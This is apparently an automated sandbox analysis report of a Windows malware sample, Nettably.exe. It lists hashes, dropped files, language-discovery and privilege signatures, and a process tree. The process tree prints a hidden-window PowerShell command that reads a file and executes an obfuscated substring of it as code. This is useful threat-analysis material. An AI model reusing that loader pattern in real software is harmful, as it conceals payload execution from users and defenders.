Analysis
max time kernel: 129s
max time network: 102s
platform: windows10-2004_x64
resource: win10v2004-20240802-en
resource tags: arch:x64 arch:x86 image:win10v2004-20240802-en locale:en-us os:windows10-2004-x64 system
submitted: 29/08/2024, 11:15
Static task: static1
Behavioral task: behavioral1
Sample: Nettably.exe
Resource: win7-20240704-en
General
Target: Nettably.exe
Size: 698KB
MD5: 0815e4fcd9b75660891ec15ce119fa70
SHA1: 7f8c1c73194725dce424b72ff2306203f3590c3b
SHA256: 89a9123df318a4c77a378e687f5e4c1c7f7806d64c85a7360a556b487343a49b
SHA512: c613b96c177294bbbfce2e0b86d15f32d2c7c579bf4c50ef0940ae697e7cfa0f36512ff7fa221c2a5b6963ca6b000b34876707bdc56351c20d20a3ee54fa68ba
SSDEEP: 12288:67MJHZFQpHB5LOBTCUbINBoQYwXsCGJt5aFp0zS6w+CAG0snsQc:6IJHoph5CBTCUUN6QYwZrH6VfAsQc
Malware Config
Signatures
Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)
Runs PowerShell and hides the display window.
pid 4760: powershell.exe

Drops file in System32 directory (1 IoC)
File opened for modification: C:\Windows\SysWOW64\legionrernes.Bac (Nettably.exe)

Drops file in Program Files directory (1 IoC)
File opened for modification: C:\Program Files (x86)\Common Files\underskridelser.ini (Nettably.exe)

Drops file in Windows directory (1 IoC)
File opened for modification: C:\Windows\Fonts\battable.ini (Nettably.exe)

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Program crash (1 IoC)
pid 4776 (WerFault.exe), pid_target 4760, procid_target 87

System Location Discovery: System Language Discovery (1 TTP, 2 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (Nettably.exe)
Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (powershell.exe)

Suspicious behavior: EnumeratesProcesses (7 IoCs)
pid 4760: powershell.exe (7 occurrences)

Suspicious use of AdjustPrivilegeToken (1 IoC)
Token: SeDebugPrivilege, pid 4760 (powershell.exe)

Suspicious use of WriteProcessMemory (3 IoCs)
PID 3852 (Nettably.exe) wrote to memory of 4760, procid_target 87 (3 occurrences)
Processes
C:\Users\Admin\AppData\Local\Temp\Nettably.exe (depth 1)
  command line: "C:\Users\Admin\AppData\Local\Temp\Nettably.exe"
  PID: 3852
  - Drops file in System32 directory
  - Drops file in Program Files directory
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 2)
    command line: "powershell.exe" -windowstyle hidden "$Kludgy=Get-Content 'C:\Users\Admin\AppData\Local\errancies\Tansies.Tem';$Crushes53=$Kludgy.SubString(52844,3);.$Crushes53($Kludgy)
    PID: 4760
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    C:\Windows\SysWOW64\WerFault.exe (depth 3)
      command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4760 -s 2796
      PID: 4776
      - Program crash
C:\Windows\SysWOW64\WerFault.exe (depth 1)
  command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4760 -ip 4760
  PID: 4480
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Filesize: 51KB
MD5: 5d38b5b5dd9df5889a8cdae91bda8ce0
SHA1: 55d4f7428bfc7a1c572e2f65d2877f53dfe9b00c
SHA256: 45c83c93a697679fb2f35ba68b3df5393398970f0adbda0f8af697080a661a07
SHA512: 9632d65d07e63235746f60133dfeaad9474db92a70d2264300d3f433399b0ca0e647120d3393d07e5f722597ec1e14a4111f9b0819886cb11f646d75c1e6be8d